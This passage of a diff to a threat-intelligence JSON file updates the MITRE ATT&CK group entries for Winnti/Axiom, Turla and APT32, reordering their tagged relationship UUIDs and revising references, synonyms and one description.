"43213480-78f7-4fb3-976f-d48f5f6a4c2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "8b880b41-5139-4807-baa9-309690218719", "tags": [ @@ -3509,13 +4137,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "5a84dc36-df0d-4053-9b7c-f0c388a57283", "tags": [ @@ -3523,27 +4144,6 @@ ], "type": "uses" }, - { - "dest-uuid": "2fab555f-7664-4623-b4e0-1675ae38190b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -3551,27 +4151,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f2e8c7a1-cae1-45c4-baf0-6f21bdcbb2c2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", "tags": [ @@ -3579,41 +4158,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b07c2c47-fefb-4d7c-a69e-6a3296171f54", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9de2308e-7bed-43a3-8e58-f194b3586700", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ @@ -3622,21 +4166,63 @@ "type": "uses" }, { - "dest-uuid": "1d808f62-cf63-4063-9727-ff6132514c22", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "a52edc76-328d-4596-85e7-d56ef5a9eb69", + "dest-uuid": "9de2308e-7bed-43a3-8e58-f194b3586700", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f2e8c7a1-cae1-45c4-baf0-6f21bdcbb2c2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2fab555f-7664-4623-b4e0-1675ae38190b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3649,6 +4235,62 @@ ], "type": "uses" }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b07c2c47-fefb-4d7c-a69e-6a3296171f54", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a52edc76-328d-4596-85e7-d56ef5a9eb69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c9cd7ec9-40b7-49db-80be-1399eddd9c52", "tags": [ @@ -3656,6 +4298,48 @@ ], "type": "uses" }, + { + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1d808f62-cf63-4063-9727-ff6132514c22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b42378e0-f147-496f-992a-26a49705395b", "tags": [ @@ -3664,7 +4348,7 @@ "type": "uses" }, { - "dest-uuid": "4900fabf-1142-4c1f-92f5-0b590e049077", + "dest-uuid": "b45747dc-87ca-4597-a245-7e16a61bc491", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3677,20 +4361,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e51398e6-53dc-4e9f-a323-e54683d8672b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "20a66013-8dab-4ca3-a67d-766c842c561c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768", "tags": [ @@ -3699,7 +4369,21 @@ "type": "uses" }, { - "dest-uuid": "1a295f87-af63-4d94-b130-039d6221fb11", + "dest-uuid": "e51398e6-53dc-4e9f-a323-e54683d8672b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54eb2bab-125f-4d1c-b999-0c692860bafe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3716,10 +4400,10 @@ "refs": [ "https://attack.mitre.org/groups/G0001", "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf", - "http://blogs.cisco.com/security/talos/threat-spotlight-group-72", "https://securelist.com/winnti-more-than-just-a-game/37029/", "https://securelist.com/games-are-over/70991/", - "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf" + "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf", + "http://blogs.cisco.com/security/talos/threat-spotlight-group-72" ], "synonyms": [ "Axiom", @@ -3762,20 +4446,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "94379dec-5c87-49db-b36e-66abc0b81344", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", "tags": [ @@ -3791,7 +4461,21 @@ "type": "uses" }, { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "95047f03-4811-4300-922e-1ba937d53a61", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "94379dec-5c87-49db-b36e-66abc0b81344", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3805,7 +4489,7 @@ "type": "uses" }, { - "dest-uuid": "95047f03-4811-4300-922e-1ba937d53a61", + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3823,10 +4507,10 @@ "https://attack.mitre.org/groups/G0010", "https://securelist.com/the-epic-turla-operation/65545/", "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", - "https://securelist.com/introducing-whitebear/81638/", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/", - "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", + "https://securelist.com/introducing-whitebear/81638/" ], "synonyms": [ "Turla", @@ -3859,48 +4543,6 @@ ], "type": "uses" }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "80a014ba-3fef-4768-990b-37d8bd10d7f4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "76abb3ef-dafd-4762-97cb-a35379429db4", "tags": [ @@ -3908,55 +4550,6 @@ ], "type": "uses" }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30489451-5886-4c46-90c9-0dff9adc5252", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "92b55426-109f-4d93-899f-1833ce91ff90", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ @@ -3965,7 +4558,14 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3979,42 +4579,28 @@ "type": "uses" }, { - "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b35068ec-107a-4266-bda8-eb7036267aea", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4028,42 +4614,7 @@ "type": "uses" }, { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "536be338-e2ef-4a6b-afb6-8d5568b91eb2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4077,7 +4628,154 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "92b55426-109f-4d93-899f-1833ce91ff90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "80a014ba-3fef-4768-990b-37d8bd10d7f4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b35068ec-107a-4266-bda8-eb7036267aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30489451-5886-4c46-90c9-0dff9adc5252", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "536be338-e2ef-4a6b-afb6-8d5568b91eb2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "da5880b4-f7da-4869-85f2-e0aba84b8565", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4091,7 +4789,14 @@ "type": "uses" }, { - "dest-uuid": "da5880b4-f7da-4869-85f2-e0aba84b8565", + "dest-uuid": "b7e9880a-7a7c-4162-bddb-e28e8ef2bf1f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3433a9e8-1c47-4320-b9bf-ed449061d1c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4102,18 +4807,20 @@ "value": "Turla - G0010" }, { - "description": "[APT32](https://attack.mitre.org/groups/G0050) is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, Phillipines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. \nThe group is believed to be Vietnam-based. (Citation: FireEye APT32 May 2017) (Citation: Volexity OceanLotus Nov 2017) (Citation: ESET OceanLotus)", + "description": "[APT32](https://attack.mitre.org/groups/G0050) is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. The group is believed to be Vietnam-based. (Citation: FireEye APT32 May 2017) (Citation: Volexity OceanLotus Nov 2017) (Citation: ESET OceanLotus)", "meta": { "external_id": "G0050", "refs": [ "https://attack.mitre.org/groups/G0050", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/", - "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/" + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt" ], "synonyms": [ "APT32", - "OceanLotus Group", + "SeaLotus", + "OceanLotus", "APT-C-00" ] }, @@ -4140,21 +4847,14 @@ "type": "uses" }, { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4174,13 +4874,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", "tags": [ @@ -4188,76 +4881,6 @@ ], "type": "uses" }, - { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "98e8a977-3416-43aa-87fa-33e287e9c14c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f6ae7a52-f3b6-4525-9daf-640c083f006e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ @@ -4266,14 +4889,77 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "dest-uuid": "98e8a977-3416-43aa-87fa-33e287e9c14c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f25aab1a-0cef-4910-a85d-bb38b32ea41a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4286,6 +4972,13 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9ca488bd-9587-48ef-b923-1743523e63b2", "tags": [ @@ -4294,28 +4987,21 @@ "type": "uses" }, { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "f6ae7a52-f3b6-4525-9daf-640c083f006e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4329,7 +5015,294 @@ "type": "uses" }, { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30489451-5886-4c46-90c9-0dff9adc5252", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + 